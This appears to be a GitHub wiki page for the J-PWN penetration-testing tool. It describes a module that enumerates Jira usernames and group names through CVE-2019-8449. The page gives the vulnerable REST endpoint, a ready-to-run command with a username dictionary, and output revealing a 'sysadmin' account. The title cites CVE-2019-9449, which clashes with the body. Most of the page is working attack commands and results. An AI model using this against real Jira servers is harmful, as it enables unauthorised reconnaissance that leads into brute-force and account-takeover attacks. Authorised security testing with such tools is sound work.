CVE‐2019‐9449 Brute Force - carnal0wnage/J-PWN GitHub Wiki
This threaded module guesses usernames against the url below via CVE-2019-8449
module name: cve_2019_8449_brute
url: rest/api/latest/groupuserpicker?query={username}&maxResults=50000&showAvatar=true
python3 j-pwn.py --single http://JIRASRVER --module cve_2019_8449_brute --dict ../jira.users.txt
[INFO] Running module cve_2019_8449_brute with dictionary ../jira.users.txt
INFO: Total usernames to check: 43
INFO: Groups matching 'developers':
- Group Name: developers
INFO: Groups matching 'users':
- Group Name: users
+ Valid username found: sysadmin
- HTML: System Administrator (<strong>sysadmin</strong>)
- Display Name: System Administrator
+ Vulnerabilities Found:
+ [CVE-2019-8449 | Username Enumeration] Valid Group Name found: developers
+ [CVE-2019-8449 | Username Enumeration] Valid Group Name found: users
+ [CVE-2019-8449 | Username Enumeration] Valid username found: sysadmin
Notes:
The module prints some status so you can see what's happening You can set verbose = True in the module code if you want to see each request being made